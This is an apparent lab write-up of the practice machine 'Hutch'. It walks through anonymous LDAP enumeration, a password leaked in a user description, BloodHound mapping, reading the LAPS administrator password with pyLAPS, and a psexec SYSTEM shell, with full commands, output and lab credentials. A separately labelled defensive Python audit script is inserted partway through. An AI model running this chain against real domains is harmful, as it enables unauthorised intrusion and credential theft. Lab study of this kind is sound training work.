
Hutch

Machine Information

  • Machine Name: Hutch
  • Machine Difficulty: Intermediate

Information Gathering

Classic nmap time

Nmap scan report for 192.168.135.122                                                                                  
Host is up, received user-set (0.013s latency).                                                                       
Scanned at 2024-10-19 15:54:28 +08 for 202s                                                                           
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus                                 
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:                                                                                                       
|   Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:                     
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK 
|   Server Type: Microsoft-IIS/10.0
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_  Server Date: Sat, 19 Oct 2024 07:57:09 GMT
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 07:56:09Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0  
|_http-title: Not Found                      
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49768/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

I started with port 80 but could not find anything useful there, so I moved on to enumerating LDAP.

Port 389

I’ll be using netexec to enumerate LDAP, as I don’t know how to use ldapsearch.

netexec ldap 192.168.135.122 -u "" -p ""                  
SMB         192.168.135.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP        192.168.135.122 389    HUTCHDC          [+] hutch.offsec\:

So LDAP allows a bind with empty credentials (anonymous bind), which means I can pull some useful information from it without a valid account.

netexec ldap 192.168.135.122 -u "" -p "" -M get-desc-users
SMB         192.168.135.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP        192.168.135.122 389    HUTCHDC          [+] hutch.offsec\: 
GET-DESC... 192.168.135.122 389    HUTCHDC          [+] Found following users: 
GET-DESC... 192.168.135.122 389    HUTCHDC          User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 192.168.135.122 389    HUTCHDC          User: fmcsorley description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.

Looking through the output, I noticed that the description field of the user fmcsorley contains a password. Time to check whether it actually works.
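As an added defender-side example (not code from the original post or from netexec), here is a small Python audit that parses `get-desc-users` output of the kind shown above and flags accounts whose description attribute carries a credential, the same weakness that exposed fmcsorley's password. The sample output, host name, users and passwords are constructed for this example, and `looks_like_secret` is a simple heuristic of my own, not a netexec feature.

```python
import re
from typing import Optional

# Constructed sample in the shape of `netexec ldap <dc> -u "" -p "" -M get-desc-users`
# output; host, users and passwords are made up for this example.
SAMPLE_OUTPUT = """\
GET-DESC... 10.0.0.5 389 DC01 [+] Found following users:
GET-DESC... 10.0.0.5 389 DC01 User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.0.0.5 389 DC01 User: jdoe description: Password set to Winter2024! at user's request. Please change on next login.
GET-DESC... 10.0.0.5 389 DC01 User: svc_backup description: Backup service account, owner: IT ops
GET-DESC... 10.0.0.5 389 DC01 User: helpdesk description: temp pwd: Welcome123
"""

# One "User: <sam> description: <text>" line of the module output.
USER_LINE = re.compile(r"User:\s+(?P<user>\S+)\s+description:\s*(?P<desc>.*)$")

# A credential keyword, an optional "set to" / "is" / ":" / "=" joiner, then the candidate token.
CRED_HINT = re.compile(
    r"\b(?:password|passwd|pwd|pass|pw)\b[ \t]*(?:set to|is|:|=)?[ \t]*(?P<secret>\S+)",
    re.IGNORECASE)


def looks_like_secret(token: str) -> bool:
    """Cheap heuristic: at least 6 chars and contains a digit or symbol (not a plain word)."""
    return len(token) >= 6 and any(c.isdigit() or not c.isalnum() for c in token)


def find_secret(description: str) -> Optional[str]:
    """Return the first password-looking token that follows a credential keyword, else None."""
    for m in CRED_HINT.finditer(description):
        candidate = m.group("secret").rstrip(".,;")
        if looks_like_secret(candidate):
            return candidate
    return None


def mask(secret: str) -> str:
    """Keep two leading chars for triage; never echo the full value into a report."""
    return secret[:2] + "*" * (len(secret) - 2)


def audit_netexec_output(output: str) -> list:
    """Parse get-desc-users output; return (user, masked secret) for leaky descriptions."""
    findings = []
    for line in output.splitlines():
        m = USER_LINE.search(line)
        if not m:
            continue  # banner and status lines
        secret = find_secret(m.group("desc"))
        if secret:
            findings.append((m.group("user"), mask(secret)))
    return findings
```

Running `audit_netexec_output(SAMPLE_OUTPUT)` reports jdoe and helpdesk and leaves the Guest and service-account descriptions alone; on a real domain the same check belongs in a scheduled audit of the description attribute, since an anonymous bind is enough to read it.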

netexec ldap 192.168.135.122 -u fmcsorley -p CrabSharkJellyfish192
SMB         192.168.135.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP        192.168.135.122 389    HUTCHDC          [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192 

The credential works, so I ran bloodhound-python to get an overview of the Active Directory environment.

bloodhound-python -d 'hutch.offsec' -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.135.122 -c All --zip
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 03S
INFO: Compressing output into 20241019202639_bloodhound.zip

After getting the zip file, I imported it into BloodHound and had a quick look.

It seems that the user I have, fmcsorley, holds the ReadLAPSPassword permission. According to BloodHound, ReadLAPSPassword allows the principal to read the password set by LAPS, and the local administrator password is managed by LAPS. This means I can obtain the local administrator password with this permission alone. To retrieve it, BloodHound suggests pyLAPS.py.

python pyLAPS/pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" --dc-ip 192.168.135.122 
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           
    
[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : 95X,%O(]0b1@88
[+] All done!

I then checked with netexec whether that password gives me access as the local administrator.

netexec smb 192.168.135.122 -u administrator -p '95X,%O(]0b1@88' 
SMB         192.168.135.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.135.122 445    HUTCHDC          [+] hutch.offsec\administrator:95X,%O(]0b1@88 (Pwn3d!)

netexec reports Pwn3d! directly on SMB, which means the account has administrative access to the host, so I can get an administrator shell right away.

impacket-psexec hutch.offsec/Administrator:'95X,%O(]0b1@88'@192.168.135.122
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.135.122.....
[*] Found writable share ADMIN$
[*] Uploading file LSgJnLEi.exe
[*] Opening SVCManager on 192.168.135.122.....
[*] Creating service CcoV on 192.168.135.122.....
[*] Starting service CcoV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

With that, I get an administrator (NT AUTHORITY\SYSTEM) shell straight away, without needing any privilege escalation.

Things that I learned from this machine

  • LDAP anonymous enumeration using netexec, and that user description fields can leak passwords
  • ReadLAPSPassword lets a low-privileged user read the LAPS-managed local administrator password
This post is licensed under CC BY 4.0 by the author.
